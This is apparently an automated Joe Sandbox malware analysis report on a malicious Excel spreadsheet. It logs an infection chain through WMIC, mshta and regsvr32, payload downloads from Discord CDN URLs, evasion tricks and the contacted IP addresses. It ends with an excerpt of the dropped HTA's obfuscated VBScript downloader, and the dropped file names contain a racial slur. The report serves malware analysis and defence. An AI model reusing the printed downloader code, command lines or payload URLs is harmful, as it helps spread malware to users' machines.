          Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
          Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
          Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
          Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD779.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/7@1/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: Results12232021.xlsOLE indicator, Workbook stream: true
          Source: Results12232021.xls.0.drOLE indicator, Workbook stream: true
          Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Results12232021.xlsInitial sample: OLE summary codepage = 1200
          Source: Results12232021.xlsInitial sample: OLE document summary codepagedoc = 1200
          Source: Results12232021.xls.0.drInitial sample: OLE summary codepage = 1200
          Source: Results12232021.xls.0.drInitial sample: OLE document summary codepagedoc = 1200
          Source: Binary string: wntdll.pdb source: regsvr32.exe, 0000000B.00000003.593737070.000000007DE80000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593142361.0000000002700000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593332634.0000000002850000.00000004.00000001.sdmp
          Source: Binary string: RFFGTEQ.pdb source: mshta.exe, 00000005.00000003.581516518.0000000006934000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121978268.0000000005D10000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581607342.00000000069BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1122012753.0000000006000000.00000004.00000001.sdmp, fvfnigger.bin.5.dr, WIvRRHIemuhammadismyfriend[1].bin.5.dr
          Source: 649C.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A6F6A8 push esi; mov dword ptr [esp], 00000000h
          Source: initial sampleStatic PE information: section where entry point is pointing to: .rdata

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
          Source: C:\Windows\System32\mshta.exeFile created: C:\ProgramData\fvfnigger.binJump to dropped file
          Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].binJump to dropped file
          Source: C:\Windows\System32\mshta.exeFile created: C:\ProgramData\fvfnigger.binJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: nxebchwsihyfkihhssltp.rtf
          Source: unknownProcess created: cmd line: nxebchwsihyfkihhssltp.rtf
          Source: C:\Windows\System32\mshta.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to delay execution (extensive OutputDebugStringW loop)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: OutputDebugStringW count: 1127
          Source: C:\Windows\System32\wbem\WMIC.exe TID: 2232Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\mshta.exe TID: 1124Thread sleep time: -360000s >= -30000s
          Source: C:\Windows\System32\wbem\WMIC.exe TID: 2568Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2792Thread sleep count: 1127 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
          Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].binJump to dropped file
          Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1127
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A70730 GetSystemInfo,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Yara detected hidden Macro 4.0 in ExcelShow sources
          Source: Yara matchFile source: Results12232021.xls, type: SAMPLE
          Source: Yara matchFile source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPED
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
          Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,
          Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection12Disable or Modify Tools1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting31Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsModify Registry1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion11Security Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting31LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery26Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Results12232021.xls21%ReversingLabsDocument-Excel.Trojan.Abracadabra

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.2.regsvr32.exe.72a60000.8.unpack100%AviraHEUR/AGEN.1144420Download File
          11.2.regsvr32.exe.1a0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.baxleystamps.comDVarFileInfo$0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn.discordapp.com
          162.159.135.233
          truefalse
            high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.binfalse
              high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpfalse
                high
                http://investor.msn.commshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpfalse
                    high
                    http://crl.entrust.net/server1.crl0mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                      high
                      http://ocsp.entrust.net03mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.discordapp.com/attachments/914827690882781237/923509241996795935/iivKjRymuhammadismyfriemshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmpfalse
                        high
                        https://cdn.discordapp.com/mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmpfalse
                          high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oemshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpfalse
                            high
                            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpfalse
                              high
                              https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfrimshta.exe, 00000005.00000002.1121286244.0000000004EF5000.00000004.00000040.sdmp, mshta.exe, 00000005.00000003.582502016.00000000002FD000.00000004.00000001.sdmpfalse
                                high
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmpfalse
                                  high
                                  http://investor.msn.com/mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmpfalse
                                    high
                                    https://cdn.discordapp.com/attachments/914827690882781237/923509168294461500/rebXcmuhammadismyfriendmshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmpfalse
                                      high
                                      http://www.baxleystamps.comDVarFileInfo$regsvr32.exe, 0000000B.00000002.1118809244.0000000072A7F000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.%s.comPAmshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      low
                                      http://ocsp.entrust.net0Dmshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://secure.comodo.com/CPS0mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                                        high
                                        http://servername/isapibackend.dllWMIC.exe, 00000003.00000002.576396153.0000000001BC0000.00000002.00020000.sdmp, WMIC.exe, 00000008.00000002.585430316.0000000001C00000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117795562.0000000001C60000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1117736563.0000000000800000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmpfalse
                                          high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.4.135.27
                                          unknownGreece
                                          199246TOPHOSTGRtrue
                                          162.159.135.233
                                          cdn.discordapp.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          85.10.248.28
                                          unknownGermany
                                          24940HETZNER-ASDEtrue
                                          80.211.3.13
                                          unknownItaly
                                          31034ARUBA-ASNITtrue
                                          144.91.122.102
                                          unknownGermany
                                          51167CONTABODEtrue

                                          General Information

                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                          Analysis ID:544578
                                          Start date:23.12.2021
                                          Start time:16:58:39
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 27s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Results12232021.xls
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winXLS@9/7@1/5
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 95.8% (good quality ratio 93.8%)
                                          • Quality average: 79.4%
                                          • Quality standard deviation: 25.4%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .xls
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                          • TCP Packets have been reduced to 100
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          17:00:37API Interceptor25x Sleep call for process: WMIC.exe modified
                                          17:00:38API Interceptor1799x Sleep call for process: mshta.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN

                                          No context

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):5136
                                          Entropy (8bit):5.067366698175852
                                          Encrypted:false
                                          SSDEEP:96:SImUgO09KIb58lgGA9pbN4YjKPpM+CNKC60q/jcT++afjYzJP8J:SImZrHqljopb2+dUjcS+iEzJP8J
                                          MD5:AC47648EF54852865CC2096C3C511D68
                                          SHA1:F9FDECD0F6F81F6E721B638217B9340409C76987
                                          SHA-256:50D220962236F5B89192F5A4C388B2AA60A910DF8D4D7F0C014E88E64BAFCF6D
                                          SHA-512:E6F1ABF1DDE8A753CF99281D66331EBD56EFEAF3B5B5F7C86B7EB921CA40FC37890C377E3EDBDC032932620C50DFC9FB46D34906A15726C1523FA349DB391794
                                          Malicious:true
                                          Reputation:low
                                          Preview: ..<!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="Test"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..Set XgpPGDehVjSimIl = CreateObject(Chr(77) & Chr(83) & "XM" & "" & "" & "" & "L2" & Chr(46) & Chr(88) & "" & "MLH" & Chr(84) & "TP" & ".6" & "" & ".0")..VqozoHcfiGvmdP = "" & "Ws" & "" & "" & "cr" & "ip" & "t." & "She" & "ll" & ""..Set oZSSSKhdOJC = CreateObject(VqozoHcfiGvmdP)..Set LUbUiVcHDOC = CreateObject(Chr(83) & "cri" & Chr(112) & "" & "ti" & "ng" & Chr(46) & "" & "Fil" & "eSy" & "ste" & "" & "mOb" & "jec" & "" & "" & Chr(116))....Function rTDVniIJZPvEWKiZA(EdZwJZhbDr, bjankYWnOXwPoR).. rTDVniIJZPvEWKiZA = Int((bjankYWnOXwPoR - EdZwJZhbDr + 1) * Rnd() + EdZwJZhbDr)..End Function........Function tMvPOzqQZFAAmoTY().. xpOZVpHBxBrA = Chr(119) & "mic" & Chr(32) & "pro" & "" & "" & "" & Chr(99) & "es" & "s c" & "" & "al" & "l c" & "re" & "ate" &
                                          C:\ProgramData\fvfnigger.bin
                                          Process:C:\Windows\System32\mshta.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
